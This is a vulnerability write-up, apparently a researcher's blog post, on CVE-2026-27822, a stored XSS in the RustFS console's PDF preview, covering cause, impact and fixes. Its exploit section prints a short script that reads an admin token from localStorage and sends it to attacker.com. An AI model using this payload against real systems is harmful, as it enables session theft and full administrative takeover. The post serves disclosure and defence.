CVE-2026-27822
RustFS & The PDF Trojan: Anatomy of a Critical Stored XSS
Amit Schendel
Senior Security ResearcherFeb 25, 2026·6 min read·90 visits
Executive Summary (TL;DR)
Critical Stored XSS in RustFS Console allowing full admin takeover via malicious PDF previews.
While the world rushes to rewrite everything in Rust to escape the nightmare of memory corruption, we are reminded that logic bugs and web vulnerabilities don't care about your borrow checker. CVE-2026-27822 is a critical Stored Cross-Site Scripting (XSS) vulnerability in the RustFS Management Console. By exploiting the PDF preview functionality, an attacker can turn a simple file upload into a weaponized payload that executes arbitrary JavaScript in the context of an administrator's session. This isn't just a pop-up alert; it's a full administrative account takeover via `localStorage` exfiltration, granting total control over the distributed object storage system.
The Hook: Rust Can't Save You From JavaScript
There is a certain irony in finding a critical vulnerability in a project named RustFS. The security community has spent the last decade evangelizing Rust as the silver bullet for memory safety—killing buffer overflows and use-after-free bugs by design. And they're right; Rust is fantastic at that. But RustFS isn't just a backend storage engine; it comes with a Management Console. And that console is built on the wild, untamed west of the web: HTML and JavaScript.
CVE-2026-27822 targets the RustFS Console, specifically the component responsible for previewing files. In a distributed object store, administrators often need to verify uploaded content. They click a file, a modal pops up, and they see a preview. It's a feature designed for convenience, but in this specific version range (< 1.0.0-alpha.83), it was implemented with a fatal trust in user input.
This vulnerability is a classic Stored Cross-Site Scripting (XSS) attack. The 'Stored' part makes it particularly dangerous. Unlike Reflected XSS, where you have to trick a user into clicking a weird link, Stored XSS lays a trap. The attacker places a landmine (the malicious file) in the storage system, and the victim (the admin) triggers it simply by doing their job—managing files. The moment the preview renders, the game is over.
The Flaw: The Preview Trap
The root cause of this vulnerability lies in how the RustFS Console handles the rendering of PDF files within its preview modal. When a user requests a preview, the application fetches the object data and attempts to display it. The flaw involves insufficient sanitization of the content before it interacts with the DOM (Document Object Model).
Browser-based PDF rendering is notoriously tricky. If an application blindly serves a file with Content-Type: application/pdf inside an iframe or uses a client-side library to parse and render it without strict boundaries, it opens the door to script execution. In this specific case, the preview logic allowed the execution of JavaScript embedded within the file structure or disguised as a PDF context.
Essentially, the developers locked the front door (authentication required to access the console) but left the window wide open (the preview renderer). They assumed that because a file claims to be a PDF, or is treated as a static asset, it is safe to render in the browser. This assumption is fatal. Modern browsers and PDF specs are complex beasts; if you don't explicitly tell the browser not to run scripts (via CSP or sandbox attributes), it often will, just to be 'helpful'.
The Exploit: Weaponizing the Document
Exploiting this requires a low-privilege account—anyone who can upload a file to the storage bucket. The attack chain is elegant in its simplicity and devastating in its impact.
Step 1: The Payload
The attacker crafts a malicious file. While the advisory specifically mentions PDF logic, XSS payloads in this context often involve Polyglots—files that are valid enough to be accepted by the storage engine but contain HTML/JS that the browser will execute when the content-type is mishandled or when the renderer is tricked.
// Conceptual Payload injected into the file
<script>
const adminToken = localStorage.getItem('rustfs_auth_token');
const creepUrl = 'https://attacker.com/collect?data=' + btoa(adminToken);
fetch(creepUrl);
</script>Step 2: The Trap
The attacker uploads this file to a bucket they have access to. They might name it Monthly_Financials.pdf or System_Logs_Error.pdf—something that practically begs an administrator to check it.
Step 3: The Execution
An administrator logs into the RustFS Console. They see the file. "That looks important," they think. They click the Preview button. The console opens a modal to display the file. Because the application fails to sanitize the input or sandbox the rendering frame, the browser parses the attacker's JavaScript.
At this moment, the script runs in the context of the administrator's session. It silently reads localStorage, grabs the JWT or session token, and sends it to the attacker's server. The admin sees a blank preview or a broken image; the attacker sees a new root shell.
The Impact: Total System Compromise
Why is this rated Critical (9.1)? Because in modern single-page applications (SPAs), localStorage is often where the "keys to the kingdom" are kept. RustFS stores administrator credentials and session tokens there.
Once an attacker has these tokens, they don't need to bypass a firewall or crack a password. They simply import the token into their own browser and become the administrator.
From there, the impact scales vertically:
- Data Exfiltration: The attacker can read every object in every bucket.
- Data Destruction: They can delete all backups, databases, and assets stored in the system.
- Ransomware: They can encrypt the data (download, encrypt, re-upload, delete original) and demand payment.
- Persistence: They can create new admin users for themselves to maintain access even if the original vulnerability is patched.
This is a "Game Over" scenario. The breach of the management console completely undermines the security of the underlying storage system.
The Fix: Closing the Window
The fix was released in version 1.0.0-alpha.83. If you are running any version prior to this, you are vulnerable. The remediation strategy is straightforward but urgent.
1. Patch Immediately
Update your RustFS instance to the latest version. The developers have patched the preview logic, likely by implementing strict output encoding, using a sandboxed iframe with the sandbox attribute (e.g., sandbox="allow-scripts" would be removed), or enforcing a strict Content Security Policy (CSP) on the preview modal.
# If using cargo to manage the binary
cargo install rustfs --version 1.0.0-alpha.832. Defense in Depth (Developer Takeaway)
For developers building similar systems, this is a lesson in defense in depth.
- Never trust file content: Always serve user-uploaded content with
Content-Disposition: attachmentto force a download rather than a browser render, unless strictly necessary. - Sandbox Everything: If you must preview content, do it in an
iframewith thesandboxattribute set to the absolute minimum permissions required. - Stop using LocalStorage for Secrets: Storing auth tokens in
localStoragemakes them accessible to any XSS payload. UseHttpOnlycookies, which are invisible to JavaScript, to mitigate the impact of XSS vulnerabilities.
Official Patches
Technical Appendix
CVSS Score
9.1/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:HEPSS Probability
0.04%
Top 100% most exploited
Affected Systems
RustFS Management Console < 1.0.0-alpha.83
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
rustfs rustfs | < 1.0.0-alpha.83 | 1.0.0-alpha.83 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2026-27822 |
| CVSS | 9.1 (Critical) |
| CWE | CWE-79 (Stored XSS) |
| Attack Vector | Network (Stored File Upload) |
| Impact | Admin Account Takeover |
| Affected Component | PDF Preview Logic |
| EPSS Score | 0.00041 |
MITRE ATT&CK Mapping
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Vulnerability Timeline
Vulnerability Disclosed
2026-02-25
Patch Released (v1.0.0-alpha.83)
2026-02-25
CVE Assigned
2026-02-25
